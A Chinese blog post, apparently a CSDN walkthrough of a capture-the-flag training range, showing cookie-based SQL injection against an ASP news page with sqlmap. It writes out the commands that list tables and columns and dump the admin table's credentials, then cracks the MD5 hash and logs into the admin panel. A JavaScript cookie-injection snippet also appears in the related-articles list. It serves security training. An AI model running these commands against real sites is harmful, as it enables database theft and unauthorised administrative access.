sqlmap之cookie注入(靶场第二题)

最新推荐文章于 2024-04-20 11:53:06 发布
最新推荐文章于 2024-04-20 11:53:06 发布
阅读量7.1k 收藏 9
点赞数 3
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44105778/article/details/88088511
版权

sqlmap
靶场第二题:https://hack.zkaq.org/?a=battle&f=target&id=31ac789a52edf9bb
首先我们尝试下sql注入

http://120.203.13.75:8001/shownews.asp?id=171%20and%201=1

在这里插入图片描述
说明该网站有防sql注入。那么我们使用cookie注入

http://120.203.13.75:8001/shownews.asp?id=171%20order%20by%2010

在这里插入图片描述
第一步
猜解表

sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171" --table --level 2

在这里插入图片描述
第二步,猜字段

 sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171" --column -T admin --level 2

在这里插入图片描述
第三步,爆数据

sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171"  --dump  -T admin -C "username,password" --level 2

在这里插入图片描述
b9a2a2b5dffb918c,该密码是md5加密,百度搜索md5在线加密
在这里插入图片描述
我们已经拿到密码了
进入后台网站,利用御剑工作扫出后台
在这里插入图片描述
http://120.203.13.75:8001/admin
输入账号admin,密码welcome获取flag
在这里插入图片描述

giunwr
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap指定cookie_SQLMap使用
weixin_39628041的博客
01-30 2025
SQLMapsqlmap是一款SQL注入漏洞测试工具,支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。常用参数​注意:必须指定至少一个目标-u#指定URL,必须使用双引号包含url--...
记一次猫舍由外到内的渗透撞库操作提取-flag
m0_65606241的博客
06-06 1213
猫舍靶场由外网打点进入内网后通过内网漏洞提权做撞库操作,最后拿到我们需要的成果
cookie注入
Sea_Sand息禅
12-18 1017
有个靶场上的一道,只要在id后面进行测试,立马弹窗,得不到任何信息。 这是个很好的WAF过滤,一个asp的网页,所以用cookie注入。 asp网页能用cookie注入,php不能。 (语句执行在url地址栏里,每次注入语句执行后,都要访问对应的asp文件,才会出结果,就是刷新一下就行) javascript:alert(document.cookie="id="+escape("...
注入(一)
tomyyyyy
06-28 275
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战篇_sqlmap靶场
最新发布
2401_84239625的博客
04-20 732
网上学习资料一大堆,但如果学到的知识不成体系,遇到问时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以添加V获取:vip1024b (备注软件测试)一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!堆,但如果学到的知识不成体系,遇到问时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
渗透第二课解过程
qq_37327261的博客
02-26 307
重要说明:本文作为学习笔记,仅用于学习交流,请勿用于其它用途,侵删。 目标靶场:http://120.203.13.75:8001/shownews.asp?id=171,此靶场是腾讯课堂免费课程中的演习靶场,此笔记较为基础,请大牛勿喷 第二课是基于第一课所学的知识上进一步学习渗透,所以如果哪里我一笔带过没有详细说明,那就意味着该知识点为之前笔记的知识。 这次的笔记讲的是如果目标站点有WAF...
java开发基于SQLmap的SQL注入工具源码.zip
06-01
基于SQLmap的SQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmap的SQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx)...
sqlmap专用将链接转换为Cookie注入用的代码
01-29
本工具为sqlmap专用,用于将普通注入链接转换为SQLmap里的Cookie注入链接,已经开源,代码和使用帮助全都在压缩包里 程序举例: 普通链接:http://www.xxx.com/TeachView.asp?id=21 转换为 sqlmap.py -u ...
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问的可以私信。欢迎大家提意见。
第十一节 Sqlmap注入参数2-01
09-15
"Sqlmap注入参数详解" Sqlmap是一款功能强大且广泛应用的SQL注入工具,本节课程将详细介绍Sqlmap的四个重要参数:强制设置无效值替换、自定义注入负载位置、设置Tamper脚本和设置DBMS认证。 Sqlmap强制设置无效值...
sql注入攻击之sqlmap
06-10
此外,SQLMap还具有自动化的会话保持和cookie管理功能,使得在多步骤的注入过程中保持用户会话成为可能。 使用SQLMap时,你需要了解一些基本的命令行参数和选项,例如`--dbs`用于列举所有可用的数据库,`--tables`...
存在cookie注入南方数据cms
04-24
Windows2008建站不成功,显示不出来,最好用win10吧,win10显示正常
登录别人的账户(仅在封神台靶场).mp4
04-07
这个教程仅在封神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
SQL注入学习详细过程
liwenqianye的博客
04-19 717
sql注入学习笔记一、union注入1.判断是否存在注入:2.加粗样式查询字段数量3.查询SQL语句插入位置4.获取数据库库名5.获取表名6.获取字段名7.获取数据union注入PHP代码二、Boolean注入mysql的几个内置函数:1.判断注入点2.判断数据库的长度3.获取数据库的名字4.获取表的总数5.获取第一个表的长度6.获取表的内容7.获取表的字段总数三、报错注入报错函数3.extractvalue()4.rand()+group()+count5.几何函数6.不存在的函数7.bigint数值操作
手把手带你学习SQLMAP
2301_77147728的博客
03-22 719
表中的所有字段的内容,在这里可以清晰的看到user字段对应的password字段的值,这就是拖库的基本原理,学会了的给个赞。后面一系列的黑科技,由于权限不够,暂时就不分析了,下次有机会咱们再碰一碰。相反,这也说明了权限的重要性。可以看到这里咱们的Cookie是,security=medium表示咱们现在处于中级模式。美滋滋,成功了,抓包重放,屡试不爽,学会的给个赞~这里可以看到,咱们这个漏洞靶场使用的数据库是。选哪张表,你可以看当时自己的心情。可以看到这里咱们的Cookie是,数据库里面,我们获得到。
猫舍内网靶场
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-28 1339
内网渗透 我们首先先讲一下,如何去利用sql注入漏洞 先讲两个导出文件的函数 into dumpfile 'C:\\phpstudy\\WWW\\123.txt'//写文件的一个函数,后面接路径 into outfile 'C:\\phpstudy\\WWW\\123.txt'//写文件的一个函数,后面接路径 但是一般都用不了这两个函数,他和loadfile()一起的,如果能用loadfile() ,那代表这两个函数也能用 原因是:mysql.ini的配置问,要手动添加一个配置 select 1,2,
Sqlmap2021 -- Cookie注入
weixin_41489908的博客
07-07 4047
喧闹任其喧闹,自有我自为之,我自风情万种,与世无争。。。 ---- 网易云热评 一、检测Cookie注入 1、通过BurpSuite抓包,将封包内容保存到1.txt GET /sqli/Less-20/index.php HTTP/1.1 Host: 192.168.139.129 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x.
SQLMAP进阶使用 --cookie
Z_l123的博客
02-19 5396
实验原理 Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。 1.访问DVWA网站 1)访问dvwa,并登录。admin password 2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA
网络安全1-1
小开心的博客
03-23 1004
声明:练习仅可在靶场,不可用于非法操作。 最近学习了一下网络安全的入门的相关操作,无意中找到了一个叫做封神台的靶场,搭配里边的教程学习了一下,感觉还是不错的,虽然大学学习了一些关于密码学的知识,在实际操作时,还是有一定的难度,初学者,经验能力还不够,写一篇文章记录一下。 第一章 辛巴猫舍(简单sql注入) 点击查看新闻1 1、检测一下是否有sql注入点 http://117.1...
sqlmap注入靶场
09-29
注入靶场中使用sqlmap可以用于学习和实践SQL注入攻击。 在注入靶场中,可以使用sqlmap来执行以下操作: 1. 执行基本的SQL注入测试,以验证是否存在注入漏洞: python sqlmap.py -u ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值